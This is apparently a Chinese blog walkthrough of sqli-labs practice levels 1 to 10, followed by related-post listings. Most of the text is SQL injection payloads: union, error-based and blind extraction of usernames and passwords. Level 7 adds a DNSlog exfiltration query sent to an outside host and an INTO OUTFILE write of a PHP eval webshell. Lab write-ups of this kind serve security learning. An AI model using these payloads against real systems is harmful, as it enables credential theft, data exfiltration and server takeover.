sqli_labs 1-10关

已于 2024-11-06 16:49:18 修改
阅读量791 收藏 28
点赞数 18
文章标签: 数据库 sql mybatis
于 2024-10-29 20:42:59 首次发布

SQL注入

靶场:

sqli-labs:

less1:

判断类型:

?id=1' and 1=1 --+ 正常

?id=1' and 1=2 --+ 错误

说明是字符型 且闭合方式为'

判断返回列数:

?id=1' order by 3--+

返回列数为3

注入位置:

?id=-1' union select 1,2,3 --+

显示2,3 说明注入点在2 3

注入

?id=-1' union select 1,database(),3 --+

?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+

?id=-1' union select 1,'users',group_concat(column_name) from information_schema.columns where table_name='users' --+

?id=-1' union select 1,'users',group_concat(0x7e,username,':',password) from users --+

less2:

?id=2-1 返回结果为1 说明是数字型

d=1 order by 3--+

返回列数为3

?id=-1 union select 1,2,3 --+

显示2,3 说明注入点在2 3

注入:

?id=-1 union select 1,'users',group_concat(0x7e,username,':',password) from users --+

less3:

?id=1') and 1=1 --+

?id=1') and 1=2 --+

闭合方式为')

注入:

?id=-1') union select 1,'users',group_concat(0x7e,username,':',password) from users --+

less4:

闭合方式为 ")

注入:

?id=-1") union select 1,'users',group_concat(0x7e,username,':',password) from users --+

less5:

闭合方式为'

?id=1' order by 3 --+

发现是无回显

/?id=1' order by 4 --+

但是会报错

报错注入:

?id=1' and 1=updatexml(1,substr((select group_concat(0x7e,username,':',password) from users),1,30),3) --+

只显示32位 所以第一次截取前三十位

?id=1' and 1=updatexml(1,substr((select group_concat(0x7e,username,':',password) from users),31,30),3) --+

第二次截取31-60

?id=1' and 1=updatexml(1,substr((select group_concat(0x7e,username,':',password) from users),61,30),3) --+

第三次61-90

....

less6:

闭合方式为 "

?id=1" union select 1,count(*),concat_ws(0x7e,(select database()),floor(rand(0)*2)) as z from information_schema.tables group by z--+

找到数据库名为 security

?id=1" union select 1,count(*),concat_ws(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 3,1),floor(rand(0)*2)) as z from information_schema.tables group by z--+

逐个查找 发现第四个表是含有敏感数据的 users

?id=1" union select 1,count(*),concat_ws(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 1,1),floor(rand(0)*2)) as z from information_schema.tables group by z--+

逐个查找发现users表中 第二个字段是 username

?id=1" union select 1,count(*),concat_ws(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 2,1),floor(rand(0)*2)) as z from information_schema.tables group by z--+

第三个字段是 password

?id=1" union select 1,count(*),concat_ws(0x7e,(select concat(username,'~',password) from security.users limit 0,1),floor(rand(0)*2)) as z from information_schema.tables group by z--+

逐个查询 从第一个用户开始

?id=1" union select 1,count(*),concat_ws(0x7e,(select concat(username,'~',password) from security.users limit 12,1),floor(rand(0)*2)) as z from information_schema.tables group by z--+

到第十三个用户结束 因为从第十四个开始就没有内容了 说明最多十三个

less7:

?id=1

让使用outfile

很阴险啊 测试了半天发现闭合方式是'))

DNSlog外带:

?id=1')) and (select load_file(concat('\\\\',(select database()),'.wsh91f.dnslog.cn\\dow'))) --+

但是DNSlog外带查询内容有限

所以也可以尝试使用into_outfile

?id=-1')) union select 1,2,0x3c3f706870206576616c28245f524551554553545b315d293b203f3e into outfile 'E:\\Tools\\PhpStudy\\phpstudy_pro\\WWW\\1.php'--+

注意点

1: 原内容<?php eval($_REQUEST[密码]) ?>转码后为 3c3f706870206576616c25xxxxxxxxxxxxxxxxx 前面要加0x

2: 路径内\ 要换成\\ 防止被转义

上传成功

webshell 打开蚁剑 添加数据 地址就是这个1.php的地址 密码就是刚才一句话木马写进去的内容

拿下

less8:

闭合方式为'

?id=1' order by 999 --+

什么错误都不显示

但是正确的会显示

所以用布尔盲注

注入:

?id=1' and length(database())=1 --+

使用brupsuite抓包 破解

发现数据库长度为8

?id=1' and ascii(substr(database(),1,1))=48--+

数据库名: security

?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=1 --+

表有四个

各表的长度

?id=1' and length((select table_name from information_schema.tables where table_schema = 'security' limit 3,1))=1 --+

第四个长度为5

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'security' limit 3,1),1,1))=48--+

第四个表名为users

?id=1' and (select count(column_name) from information_schema.columns where table_name='users')=§1§ --+

有三个字段

字段长度:

?id=1' and length((select column_name from information_schema.columns where table_name = 'users' limit §0§,1))=§1§ --+

各字段名:

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit §0§,1)))=§48§--+

less9:

?id=1' and if(1=1,sleep(5),1) --+

?id=1' and if(1=2,sleep(5),1) --+
反应时间不同 说明是'闭合

其余步骤 与布尔盲注一模一样

语句是?id=1' and if(布尔盲注,sleep(5),1) --+

类似:?id=1' and if(ascii(substr(database(),1,1))=48,sleep(5),1) --+

less10:

"闭合

其余步骤与less8一模一样

语句是 ?id=1" and if(布尔盲注,sleep(5),1) --+

以上就是本次sqli-labs 1-10关的全部内容,希望对您有一点点的帮助。

后续对于sqli-lbas不会更新了,因为没什么难度,准备将burpsuite官方靶场portswigger中的sqli部分全部更新(已通关)

Shadowyz.
关注
SQLi-LABS Page-1(Basic Challenges)1-22
2301_77887106的博客
05-18 1590
3.使用1' and if(ascii(substr((select column_name from information_schema.columns where table_schema="指定数据库名字" and table_name="指定数据库表" limit 0,1),1,1))=55,sleep(2),0)--+来对数据库的首个字母所属的ascii值正逐个爆破,直到触发睡眠为止。id=1'+and+left(database(),2)='s§a§'--+,继续爆破,可以看到第二位为e。
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
sqli-labs-php7.zip资源描述 sqli-labs-php7.zip是一个专注于SQL注入学习的资源包,特别适用于PHP 7.3及以上版本的环境。它提供了一个全面的练习平台,帮助用户深入理解SQL注入攻击的原理,并提升相应的防御技巧。 ...
sqli-labs 1-10(GET型注入)新手通详解(高手误入)
b1n的博客
07-16 3736
1.第一是单引号字符型注入2.用--+进行注释,页面正常显示。
sqli-labs靶场通攻略(1-10
shw_yzh的博客
08-26 918
判断数据库第一位字符的ascii码是否大于115 页面显示异常 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'
Sqli-labs解题一(Page-1-Basic Challenges)
Bird&Bird
01-05 1914
目录Less-1 单引号字符型注入Less-2 整型注入Less-3 Less-1 单引号字符型注入 输入单引号’,页面报错如下 根据报错知道是单引号字符型注入 判断有多少列(ORDER BY 语句用于根据指定的列对结果集进行排序) ?id=1' order by 3 --+ 爆库名 ?id=-1' union select 1,database(),3 --+ 爆表名 ?id=-1' union select 1,group_concat(table_name) ,3 from informat
sqli-labs page-1
Pz_mstr's Blog
09-10 536
一、前言 终于通了page-1的内容,现在做一下阶段性的总结。 二、注入思路 三、各卡讲解 level-1 level-2 level-3 level-4 level-5 level-6 level-7 level-8 level-9 level-10 level-11 level-12 level-13 level-14 level-15 l
SQLi-LABS Page-1(Basic Challenges) 解题
qq_51919093的博客
06-11 1247
Sqli-labs靶场的搭建,这篇文章只做解题。
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
03-17
靶场的搭建过程相对简单,只需将下载的“sqli-labs-master.zip”文件解压,按照官方文档或者网络上的教程进行配置,就可以在个人虚拟环境中运行。这一步对于理解Web应用的运行环境和服务器配置也是很有帮助的。 在...
sqli-labs(Page 1
Lorezon的博客
04-10 376
Less-01 单引号报错。 拼接'and 1=1--+正常,=2异常: 这里直接使用update函数报错注入。 ' and updatexml(1,concat(0x7e,database()),1)--+,直接爆出数据库名。 爆表:' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables ...
SQLi-LABS Page-1 (get篇) 上
weixin_43164512的博客
12-17 203
起因 近期打算考一下CISP-PTE,所以找出了多年前的Sqli-libs,准备再刷一遍sql注入,把一些要点记录一下方便以后复习,并和大家分享一下。 准备知识 Sqli-libs使用了mysql数据库,如果你对mysql比较精通,可以跳过本段。 在Sqli-libs中我们需要了解mysql这几个库、表和字段。 information_schema数据库表 它保存着于MySQL服务器所维护的...
sqli-labs笔记(Page-11-22
1stPeak's Blog
03-23 2289
判断注入类型详解 (1)首先id=1肯定没错 http://127.0.0.1/?id=1 //正常 (2)加单引号 http://127.0.0.1/?id=1' //正常,很大几率不存在注入;不正常,存在注入 (3)判断数字型 http://127.0.0.1/?id=1 and 1=1//正常 http://127.0.0.1/?id=1 and 1=2//不正常 基本上可以确定是数字型...
sqli-labs指南 110
热门推荐
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一1.经过语句and 1=2...
SQLi-LABS1~10详解)
CTF小白的博客
09-22 7610
目录SQLi-LABS Less-1查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看题目环境测试...
SQLI-LABS Page1 1-10
菜的只能随便写写博客
12-14 417
0x01 Less-1 字符报错注入 简单报错注入,分号检测 payload: http://192.168.44.139/sqli-labs/Less-1/?id=1' union select 1,2,3,4 --+ 检测字段数,字段为3 http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+ 查看用户:sqli@localhost http://192.168.44.139/sqli-labs/Less-
sqli-labs1-10
UP's blog
01-31 648
sqli-labs1-10
SQLI-LABS——Page-1 Basic Challenges Less-1~Less-20
Ho1aAs‘s Blog
03-28 606
文章目录前言题解Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8Less-9Less-10Less-11Less-12Less-13Less-14Less-15Less-16Less-17Less-18Less-19Less-20完 前言 记录一下SQLI-LABS基础部分前二十题,(某些题目只爆出了库名 以下是盲注tips: 时间盲注 报错注入 布尔盲注 题解 Less-1 最简单的单引号字符型注入,回显点有两个,注入两个group_cocnat() [
SQLi-LABS Page-1 (get篇) 中
weixin_43164512的博客
12-23 250
先说一个确定列数的方法 ?id=1 order by 3 %23 order by 如果我们需要对读取的数据进行排序,我们就可以使用 MySQL 的 ORDER BY 子句来设定你想按哪个字段哪种方式来进行排序,再返回搜索结果。这里就是利用这个功能,通过报错来判别列数。 通过不断增加 order by 后的数字,达到确定列数的目的。 如下面两图,为 3 时,页面正常,为 4 时,页面报错。这...
sqli-labs GET1-10
半夜好饿的博客
05-08 254
    写在前面的话:是的,我终于想起来写这个了,23333,我真的很容易忘记,1-10有很多是类似的,对于懒成癌的我,可能就不会详细说了,见谅咯,截图真的很难截的啊ORZ,默认对SQL注入有一定了解的,什么基础知识我就不说了,直接上过程,原理不解释了。 LESS-1 GET-Error based - Single quotes - String    ...
sqli-labs1-13
最新发布
12-31
### SQL注入实验平台(SQLi-Labs)第113解法指导 #### 卡概述 SQLi-Labs 是一个用于学习和练习 SQL 注入技术的安全测试环境。每一都设计有不同的漏洞场景,让参与者能够通过实际操作掌握如何利用这些安全...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值